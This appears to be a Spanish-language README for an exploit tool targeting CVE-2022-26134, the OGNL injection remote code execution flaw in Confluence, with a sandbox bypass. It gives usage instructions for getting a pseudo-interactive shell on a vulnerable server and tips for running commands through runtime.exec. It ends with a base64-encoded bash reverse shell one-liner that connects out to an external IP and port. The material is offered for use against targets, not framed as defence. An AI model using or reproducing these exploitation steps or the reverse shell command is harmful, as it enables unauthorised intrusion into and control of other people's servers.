
[CVE-2022-26134]RCE inyectado mediante expresión OGNL en Confluence con bypass de sandbox.
Confluence RCE por inyección de expresión OGNL (CVE-2022-26134) poc y exp
Se añadió bypass del sandbox, soporte para versiones altas.
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
El script verificará automáticamente si el objetivo es vulnerable y, si lo es, ingresará a un shell pseudo-interactivo.
Prueba en linux:

Prueba en windows:

Solo ingresa 'q' cuando quieras salir.
Los parámetros de los comandos se pasan directamente al método runtime.exec, el cual no tiene el contexto del shell.
por lo tanto.
En Windows, algunos comandos como dir no se pueden ejecutar directamente, puedes usar cmd.exe /c dir.
En linux, algunos símbolos especiales no tienen efecto. Si necesitas ejecutar un comando con símbolos especiales como una reverse shell, puedes codificarlo en base64 y luego usar bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}.